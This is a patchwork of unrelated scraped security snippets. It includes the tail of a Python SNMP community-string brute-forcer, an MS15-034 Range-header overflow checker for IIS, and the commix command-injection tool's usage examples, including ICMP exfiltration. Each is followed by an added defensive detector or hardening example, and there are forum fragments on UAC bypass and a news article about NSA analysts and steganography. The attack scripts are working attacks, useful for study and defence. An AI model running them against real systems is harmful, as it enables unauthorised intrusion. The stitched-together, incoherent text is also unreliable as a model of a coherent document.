            dictline[c] = counter
            time.sleep(delay)
            if stop[c] == True:
                return
        counter += 1
    f.close()
    stop[c] = True

def reply(packet):
    # scapy layer names are ICMP and IP (the original had iCMP/iP, a NameError)
    try:
        if packet[ICMP]:
            pos = ipaddr.index(packet[IP].src)
    except:
        return
    for x in processes:
        if x.name == ipaddr[pos]:
            minline[pos] = int((dictline[pos]-(0.05+rtt)/(delay[pos]/1000000.0))+1) if 0 < (0.05+rtt)/(delay[pos]/1000000.0) else 1
            maxline[pos] = dictline[pos]
            if minline[pos] == maxline[pos]:
                f = open(snmpfile, 'r')
                g = 1
                for lines in f:
                    if g == maxline[pos]:
                        print 'SNMP Community for', ipaddr[pos], 'is:', lines.rstrip()
                    g += 1
            else:
                print '%s snmp community found between line %d and %d in %s. Please wait while narrowing it down.' % (ipaddr[pos], int((dictline[pos]-(0.05+rtt)/(delay[pos]/1000000.0))+1) if 0 < (0.05+rtt)/(delay[pos]/1000000.0) else 1, dictline[pos], snmpfile)
                stop[pos] = True # was a no-op comparison (==) in the original
                x.terminate()
                time.sleep(1) # wait for existing thread to stop
                dictline[pos] = 1
                stop[pos] = False
                delay[pos] = delay[pos]*5
                p = Process(target=snmpscan, name=ipaddr[pos], args=(ipaddr[pos], delay, stop, dictline, pos, minline, maxline))
                processes[pos] = p
                p.start()

if __name__ == "__main__":
    global processes
    processes = []
    dictline = Array('i', [1]*len(ipaddr))
    stop = Array('i', [False]*len(ipaddr))
    minline = Array('i', [0]*len(ipaddr))
    maxline = Array('i', [0]*len(ipaddr))
    delay = Array('i', [defaultdelay]*len(ipaddr))
    c = 0
    for a in ipaddr:
        p = Process(target=snmpscan, name=a, args=(a, delay, stop, dictline, c, minline, maxline))
        processes.append(p)
        p.start()
        c += 1
    sniff(prn=reply, filter="icmp", store=0)

Source: https://0x41.no/hacking-networks-with-snmp/
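The two things a network defender can actually see in the traffic above are a "management" source that cycles through many community strings in a short window, and SetRequests that write to CISCO-CONFIG-COPY-MIB (1.3.6.1.4.1.9.9.96, the ccCopy* objects used by the download/upload scripts). The following detector is an added example, not code from the post: it decodes SNMPv1/v2c messages from raw UDP payloads with a minimal BER walker and raises both alerts. The packet tuple layout, the thresholds and the sample capture are this example's own constructions; the CISCO-PING-MIB prefix matches the OID bytes (`\x2b\x06\x01\x04\x01\x09\x09\x10...`) the POC sends.

```python
"""SNMP community-guessing and config-copy detector (added example)."""
from collections import defaultdict

SET_REQUEST = 0xA3                               # SetRequest-PDU tag
CISCO_PING_MIB = "1.3.6.1.4.1.9.9.16"            # rows the blind check creates
CISCO_CONFIG_COPY_MIB = "1.3.6.1.4.1.9.9.96"     # rows the TFTP scripts create


def _tlv(tag, value):
    """BER type-length-value, short-form length (enough for these samples)."""
    assert len(value) < 128
    return bytes([tag, len(value)]) + value


def _encode_oid(dotted):
    parts = [int(p) for p in dotted.split(".")]
    out = [parts[0] * 40 + parts[1]]
    for p in parts[2:]:                          # base-128, high bit = continue
        chunk = [p & 0x7F]
        p >>= 7
        while p:
            chunk.insert(0, (p & 0x7F) | 0x80)
            p >>= 7
        out.extend(chunk)
    return bytes(out)


def build_snmp(community, oid, value=None, pdu_tag=SET_REQUEST):
    """Constructed SNMPv1 message with one varbind (INTEGER value or NULL)."""
    val = _tlv(0x02, bytes([value])) if value is not None else _tlv(0x05, b"")
    varbind = _tlv(0x30, _tlv(0x06, _encode_oid(oid)) + val)
    pdu = (_tlv(0x02, b"\x00\x00\x00\x01") + _tlv(0x02, b"\x00")
           + _tlv(0x02, b"\x00") + _tlv(0x30, varbind))
    return _tlv(0x30, _tlv(0x02, b"\x00") + _tlv(0x04, community.encode())
                + _tlv(pdu_tag, pdu))


def _read_tlv(buf, pos):
    tag, length = buf[pos], buf[pos + 1]
    pos += 2
    if length & 0x80:                            # long-form length
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    return tag, buf[pos:pos + length], pos + length


def _decode_oid(raw):
    parts, acc = [raw[0] // 40, raw[0] % 40], 0
    for b in raw[1:]:
        acc = (acc << 7) | (b & 0x7F)
        if not b & 0x80:
            parts.append(acc)
            acc = 0
    return ".".join(map(str, parts))


def parse_snmp(payload):
    """Return {version, community, pdu_tag, oids} for SNMPv1/v2c, else None."""
    try:
        tag, msg, _ = _read_tlv(payload, 0)
        t_ver, ver, pos = _read_tlv(msg, 0)
        t_com, community, pos = _read_tlv(msg, pos)
        pdu_tag, pdu, _ = _read_tlv(msg, pos)
        if (tag, t_ver, t_com) != (0x30, 0x02, 0x04) or pdu_tag not in range(0xA0, 0xA8):
            return None
        pos = 0
        for _ in range(3):                       # request-id, error-status, error-index
            _, _, pos = _read_tlv(pdu, pos)
        _, vblist, _ = _read_tlv(pdu, pos)
        oids, pos = [], 0
        while pos < len(vblist):
            _, vb, pos = _read_tlv(vblist, pos)
            t_oid, raw, _ = _read_tlv(vb, 0)
            if t_oid == 0x06:
                oids.append(_decode_oid(raw))
        return {"version": int.from_bytes(ver, "big"),
                "community": community.decode("latin-1"),
                "pdu_tag": pdu_tag, "oids": oids}
    except (IndexError, ValueError):
        return None


def detect(packets, window=1.0, max_distinct=5):
    """packets: iterable of (timestamp, src_ip, dst_ip, udp_payload). Returns alerts."""
    alerts, history = [], defaultdict(list)      # (src, dst) -> [(ts, community)]
    for ts, src, dst, payload in packets:
        msg = parse_snmp(payload)
        if msg is None:
            continue
        if msg["pdu_tag"] == SET_REQUEST and any(
                o.startswith(CISCO_CONFIG_COPY_MIB) for o in msg["oids"]):
            alerts.append("config-copy SET %s -> %s community=%r oids=%s"
                          % (src, dst, msg["community"], msg["oids"]))
        hist = history[(src, dst)]
        hist.append((ts, msg["community"]))
        hist[:] = [(t, c) for t, c in hist if ts - t <= window]
        distinct = {c for _, c in hist}
        if len(distinct) >= max_distinct:
            alerts.append("community brute-force %s -> %s: %d distinct communities within %.1fs"
                          % (src, dst, len(distinct), window))
            del hist[:]                          # one alert per burst
    return alerts


ROUTER, SPOOFED_NMS, REAL_NMS = "88.0.3.10", "80.2.0.64", "80.2.0.33"   # from the post
PING_STATUS = CISCO_PING_MIB + ".1.1.1.16.333"                          # row the POC writes
COPY_STATUS = CISCO_CONFIG_COPY_MIB + ".1.1.1.1.14.111"                 # row the scripts write


def sample_traffic():
    """Constructed capture: six guesses, a config copy, then a legitimate poll."""
    pkts = [(0.001 * i, SPOOFED_NMS, ROUTER, build_snmp(c, PING_STATUS, 6))
            for i, c in enumerate(["public", "cisco", "admin", "secret", "snmp", "private"])]
    pkts.append((0.010, SPOOFED_NMS, ROUTER, build_snmp("private", COPY_STATUS, 6)))
    pkts.append((0.020, REAL_NMS, ROUTER, build_snmp("monitor", "1.3.6.1.2.1.1.3.0", pdu_tag=0xA0)))
    return pkts


if __name__ == "__main__":
    for line in detect(sample_traffic()):
        print(line)
```

Because the attack spoofs the permitted source, the source address alone is not a useful signal; the rate of distinct community strings per source/destination pair and any write to the config-copy table are. Feeding real traffic means replacing `sample_traffic()` with tuples taken from a capture of UDP/161.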
-
Microsoft expands its bug bounty programs to include Azure, Sway, and Project Spartan | VentureBeat | Security | by Emil Protalinski
-
The Dislike button can be removed from the AdminCP quickly.
-
'''
MS15-034 Checker

Danger! This script has not been properly qa'd and will probably fail in
terrible ways. It is based off a change in HTTP!UlpParseRange in which an
error code is returned as a result of a call to HTTP!RtlULongLongAdd when
evaluating the upper and lower range of an HTTP range request.

-BF

8a8b2112 56              push    esi
8a8b2113 6a00            push    0
8a8b2115 2bc7            sub     eax,edi
8a8b2117 6a01            push    1
8a8b2119 1bca            sbb     ecx,edx
8a8b211b 51              push    ecx
8a8b211c 50              push    eax
8a8b211d e8bf69fbff      call    HTTP!RtlULongLongAdd (8a868ae1)  ; here
'''
import socket
import random

ipAddr = ""  # target host, left blank in the original
hexAllFfff = "18446744073709551615"  # 2**64 - 1, i.e. 0xFFFFFFFFFFFFFFFF in decimal

req1 = "GET / HTTP/1.0\r\n\r\n"
req = "GET / HTTP/1.1\r\nHost: stuff\r\nRange: bytes=0-" + hexAllFfff + "\r\n\r\n"

print " [*] Audit Started"
client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client_socket.connect((ipAddr, 80))
client_socket.send(req1)
boringResp = client_socket.recv(1024)
if "Microsoft" not in boringResp:
    print " [*] Not IIS"
    exit(0)
client_socket.close()

client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client_socket.connect((ipAddr, 80))
client_socket.send(req)
goodResp = client_socket.recv(1024)
if "Requested Range Not Satisfiable" in goodResp:
    print "[!!] Looks VULN"
elif " The request has an invalid header name" in goodResp:
    print " [*] Looks Patched"
else:
    print " [*] Unexpected response, cannot discern patch status"

Source: http://pastebin.com/raw.php?i=ypURDPc4
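The disassembly in the checker shows HTTP.sys computing `end - start` and then calling RtlULongLongAdd on it with 1, which fails when the sum does not fit in 64 bits. The function below is an added example, not part of the pastebin script: it performs that same bounds check on a Range header value in a front-end proxy or WAF, so that a request like `bytes=0-18446744073709551615` is rejected before it reaches the origin. The function names and the verdict labels are this example's own; it mirrors only the overflow arithmetic and does not claim to reproduce every check HTTP.sys performs.

```python
"""Range-header bounds check mirroring (last - first) + 1 in 64-bit (added example)."""
import re

ULONGLONG_MAX = (1 << 64) - 1
_SPEC = re.compile(r"^(\d*)-(\d*)$")


def check_byte_range(spec):
    """Classify one 'first-last' byte-range spec as 'ok', 'malformed' or 'overflow'."""
    m = _SPEC.match(spec.strip())
    if not m or m.groups() == ("", ""):
        return "malformed"
    first_s, last_s = m.groups()
    if first_s == "":                                   # suffix range "-N": last N bytes
        return "overflow" if int(last_s) > ULONGLONG_MAX else "ok"
    first = int(first_s)
    if first > ULONGLONG_MAX:
        return "overflow"                               # does not fit a ULONGLONG at all
    if last_s == "":                                    # open-ended "N-": nothing to add
        return "ok"
    last = int(last_s)
    if last > ULONGLONG_MAX:
        return "overflow"
    if last < first:
        return "malformed"
    # RtlULongLongAdd(last - first, 1) fails when the sum exceeds 2**64 - 1
    if (last - first) + 1 > ULONGLONG_MAX:
        return "overflow"
    return "ok"


def check_range_header(value):
    """Classify a whole Range header value; the first non-'ok' range spec wins."""
    if not value.lower().startswith("bytes="):
        return "malformed"
    for spec in value[len("bytes="):].split(","):
        verdict = check_byte_range(spec)
        if verdict != "ok":
            return verdict
    return "ok"


def flag_requests(raw_requests):
    """Return (verdict, Range value) for each raw request that carries a Range header."""
    out = []
    for raw in raw_requests:
        for line in raw.split("\r\n"):
            if line.lower().startswith("range:"):
                value = line.split(":", 1)[1].strip()
                out.append((check_range_header(value), value))
    return out


# Constructed sample requests: the checker's probe and two ordinary ones.
SAMPLE_REQUESTS = [
    "GET / HTTP/1.1\r\nHost: stuff\r\nRange: bytes=0-18446744073709551615\r\n\r\n",
    "GET /a.iso HTTP/1.1\r\nHost: stuff\r\nRange: bytes=0-1023\r\n\r\n",
    "GET /a.iso HTTP/1.1\r\nHost: stuff\r\nRange: bytes=-500\r\n\r\n",
]

if __name__ == "__main__":
    for verdict, value in flag_requests(SAMPLE_REQUESTS):
        print("%-9s %s" % (verdict, value))
```

A filter that drops the `overflow` and `malformed` verdicts with a 400 is a stop-gap for hosts that cannot be patched immediately; the vulnerable parsing happens in kernel mode before the application sees the request, so the check has to sit in front of the IIS host, not inside the site.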
-
- 1
-
-
Changes: A new attack mode has been added. A completely new fuzzing dialog has been introduced that allows multiple injection points to be attacked at the same time. Various other updates and additions.
-
When I took it, and probably still now: pen and paper. And there are two parts: Computer Science and Math.
-
The idea was to do privilege escalation / bypass UAC. Where is this application's folder, Program Files or AppData? If it's in Program Files, crap, you have no write permission there as a "normal user". Then, does the application run as Admin? Even if it has to be started manually (i.e. not at startup) and even if the UAC prompt appears, it will be legitimate, but if not, "tunis-pula"'s exploits are useless crap.
-
"unserialize" is magic. In the worst sense of the word.
-
commix { v0.1b }
+-- Automated All-in-One OS Command Injection and Exploitation Tool
Copyright © 2015 Anastasios Stasinopoulos (@ancst)
+--

General Information

Commix (short for [comm]and [i]njection e[x]ploiter) has a simple environment and it can be used by web developers, penetration testers or even security researchers to test web applications with the view to find bugs, errors or vulnerabilities related to command injection attacks. By using this tool, it is very easy to find and exploit a command injection vulnerability in a certain vulnerable parameter or string. Commix is written in the Python programming language.

Disclaimer

The tool is only for testing and academic purposes and can only be used where strict consent has been given. Do not use it for illegal purposes!!

Requirements

Python version 2.6.x or 2.7.x is required for running this program.

Installation

Download commix by cloning the Git repository:

git clone https://github.com/stasinopoulos/commix.git commix

Usage

Usage: python commix.py [options]

Options
  -h, --help            Show help and exit.
  --verbose             Enable the verbose mode.
  --install             Install 'commix' to your system.
  --version             Show version number and exit.
  --update              Check for updates (apply if any) and exit.

Target
  These options have to be provided, to define the target URL.
  --url=URL             Target URL.
  --url-reload          Reload target URL after command execution.

Request
  These options can be used, to specify how to connect to the target URL.
  --host=HOST           HTTP Host header.
  --referer=REFERER     HTTP Referer header.
  --user-agent=AGENT    HTTP User-Agent header.
  --cookie=COOKIE       HTTP Cookie header.
  --headers=HEADERS     Extra headers (e.g. 'Header1:Value1\nHeader2:Value2').
  --proxy=PROXY         Use a HTTP proxy (e.g. '127.0.0.1:8080').
  --auth-url=AUTH_..    Login panel URL.
  --auth-data=AUTH..    Login parameters and data.
  --auth-cred=AUTH..    HTTP Basic Authentication credentials (e.g. 'admin:admin').

Injection
  These options can be used, to specify which parameters to inject and to provide custom injection payloads.
  --data=DATA           POST data to inject (use 'INJECT_HERE' tag).
  --suffix=SUFFIX       Injection payload suffix string.
  --prefix=PREFIX       Injection payload prefix string.
  --technique=TECH      Specify a certain injection technique: 'classic', 'eval-based', 'time-based' or 'file-based'.
  --maxlen=MAXLEN       The length of the output on time-based technique (Default: 10000 chars).
  --delay=DELAY         Set Time-delay for time-based and file-based techniques (Default: 1 sec).
  --base64              Use Base64 (enc)/(de)code trick to prevent false-positive results.
  --tmp-path=TMP_P..    Set remote absolute path of temporary files directory.
  --icmp-exfil=IP_..    Use the ICMP exfiltration technique (e.g. 'ip_src=192.168.178.1,ip_dst=192.168.178.3').
  --alter-shell         Use an alternative os-shell (Python).

Usage Examples

Exploiting Damn Vulnerable Web App:

python commix.py --url="http://192.168.178.58/DVWA-1.0.8/vulnerabilities/exec/#" --data="ip=INJECT_HERE&submit=submit" --cookie="security=medium; PHPSESSID=nq30op434117mo7o2oe5bl7is4"

Exploiting php-Charts 1.0 using injection payload suffix & prefix string:

python commix.py --url="http://192.168.178.55/php-charts_v1.0/wizard/index.php?type=INJECT_HERE" --prefix="//" --suffix="'"

Exploiting OWASP Mutillidae using Extra headers and HTTP proxy:

python commix.py --url="http://192.168.178.46/mutillidae/index.php?popUpNotificationCode=SL5&page=dns-lookup.php" --data="target_host=INJECT_HERE" --headers="Accept-Language:fr\nETag:123\n" --proxy="127.0.0.1:8081"

Exploiting Persistence using ICMP exfiltration technique:

su -c "python commix.py --url="http://192.168.178.8/debug.php" --data="addr=127.0.0.1" --icmp-exfil="ip_src=192.168.178.5

Source: https://github.com/stasinopoulos/commix
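The bug class commix looks for (the DVWA "exec" page in the first usage example is a ping form) comes down to one pattern: user input pasted into a shell command string. The block below is an added example, not part of commix: it shows that sink next to the fix a developer would ship, an allow-list of what a ping target may look like, passed as a single argv element with no shell. The function names and the constructed inputs are this example's own; `ipaddress` and `shlex` are Python standard-library modules.

```python
"""Command-injection sink and its hardened form (added example)."""
import ipaddress
import re
import shlex

# RFC 1123 hostname: dot-separated labels of letters, digits and inner hyphens.
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
_HOSTNAME = re.compile(r"^(?=.{1,253}$)(?:%s\.)*%s$" % (_LABEL, _LABEL))


def ping_command_unsafe(target):
    """The vulnerable pattern: the value lands in a shell string unchanged."""
    return "ping -c 1 " + target          # e.g. shell_exec("ping -c 1 " . $_POST['ip'])


def validate_target(target):
    """Allow-list: an IPv4/IPv6 literal or an RFC 1123 hostname, nothing else."""
    try:
        return str(ipaddress.ip_address(target))
    except ValueError:
        pass
    if _HOSTNAME.match(target):
        return target
    raise ValueError("rejected target: %r" % (target,))


def ping_command_safe(target):
    """Hardened form: validated value as one argv element for subprocess.run(..., shell=False)."""
    return ["ping", "-c", "1", validate_target(target)]


def ping_command_quoted(target):
    """Defence in depth when a shell string is unavoidable: validate, then quote."""
    return "ping -c 1 " + shlex.quote(validate_target(target))


def triage(inputs):
    """Constructed inputs -> which ones the hardened form rejects."""
    verdicts = {}
    for value in inputs:
        try:
            ping_command_safe(value)
            verdicts[value] = "accepted"
        except ValueError:
            verdicts[value] = "rejected"
    return verdicts


if __name__ == "__main__":
    # Constructed probes in the shape commix sends: separator, subshell, newline.
    for value, verdict in triage(["127.0.0.1", "example.com", "127.0.0.1; id",
                                  "$(id)", "127.0.0.1\nid", "-c 1000 127.0.0.1"]).items():
        print("%-22r %s" % (value, verdict))
```

Neither validation nor quoting alone is the point: the argv form removes the shell from the path entirely, the allow-list also blocks option-injection (a value beginning with `-`), and quoting is only the fallback where a shell string cannot be avoided.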
-
-
NSA analysts are being paid to watch a LOT of porn
Graham Cluley | April 6, 2015 12:45 am

There's been a lot of concern about how intelligence agencies around the world have been covertly snooping on private emails, instant message communications and phone calls, but here's something you may not have realised. They also get to watch a lot of porn.

The Daily Beast has the scoop, explaining that CIA and NSA analysts are tasked with examining graphic content that may have been recovered from computers and smartphones during the pursuit of alleged terrorists.

Much of this content is retrieved by the NSA's controversial Tailored Access Operations (TAO) group, which is said to have infected 50,000 systems around the world with malware and even intercepted Microsoft Windows crash error reports.

In addition, according to the report, the examined content (which can contain disturbing snuff movies and child abuse images, as well as conventional pornography) is scooped up from "websites frequented by jihadists" and "in some cases" viewed in real-time as it is posted by people of interest.

The NSA has reportedly provided its own private viewing room for those employed to watch porn.

And it's not all beheading videos. Yes, these snuff films have become vital sources of clues for U.S. intelligence analysts. But the vast majority of material these analysts are studying, according to current and former intelligence officials, is a very different sort of NSFW fare. "It's mostly porn," a former intelligence officer who worked on counterterrorism operations, told The Daily Beast. At the headquarters of the NSA in Ft. Meade, Md., another former intelligence officer said, there is a closed room set aside for watching porno clips.

One of the reasons that intelligence agencies are checking out the porn videos of terrorists is, apparently, because they are very aware that groups could hide messages within them using steganography.

Steganography is the technique of hiding a message within a digital graphic image - making it something that you won't be able to spot with the naked eye. By disguising a message in this way your hope is that anyone intercepting the communication won't realise its true purpose, meaning it remains a secret until the recipient at the other end runs a program to extract the hidden message.

It isn't entirely fanciful to imagine that terrorists might hide secret messages inside porn movies. In 2011, for instance, German police arrested a suspected al-Qaeda member carrying a memory card. When the memory card was examined, Ars Technica reported in 2012, it was discovered to contain a password-protected folder that (when it eventually revealed its secrets) contained a pornographic video called "KickAss". Later it was determined that the "KickAss" porn flick contained its own secrets, disguised through steganography:

Within that video, they discovered 141 separate text files, containing what officials claim are documents detailing al-Qaeda operations and plans for future operations—among them, three entitled "Future Works," "Lessons Learned," and "Report on Operations."

Of course, simply watching a blue movie shouldn't be an effective way to tell if it contains data hidden through steganography, if the terrorist is doing their job properly. But I guess the agency would be considered remiss if they didn't have someone tasked with the onerous job of reading every document, checking every image, and watching every minute of video that has been seized.

Although the porn angle is likely to generate some sniggers from the back of class, it actually sounds like a ghastly job, with the potential for people to be negatively impacted by some of the more harrowing content they must end up viewing. As such, regardless of whether you approve of some of the methods used by the NSA's TAO unit, it's good to hear that mental health professionals and counsellors are available to workers - who may be disturbed by the content they are paid to view.

Side note: This isn't, of course, the first time that intelligence agencies have shown a lot of interest in watching movies of people without their clothes on. The UK's GCHQ spied on more than 1.8 million Yahoo users around the world for six months back in 2008 as part of "Operation Optic Nerve", in a gross invasion of privacy. According to one GCHQ document, between 3 and 11 percent of collected Yahoo webcam images contained sexually explicit content.

Which makes me think, there must have been some poor sod whose job it was to count every time someone got nude on their Yahoo webcam chat. That's a pretty awful job too.

Source: https://grahamcluley.com/2015/04/nsa-porn/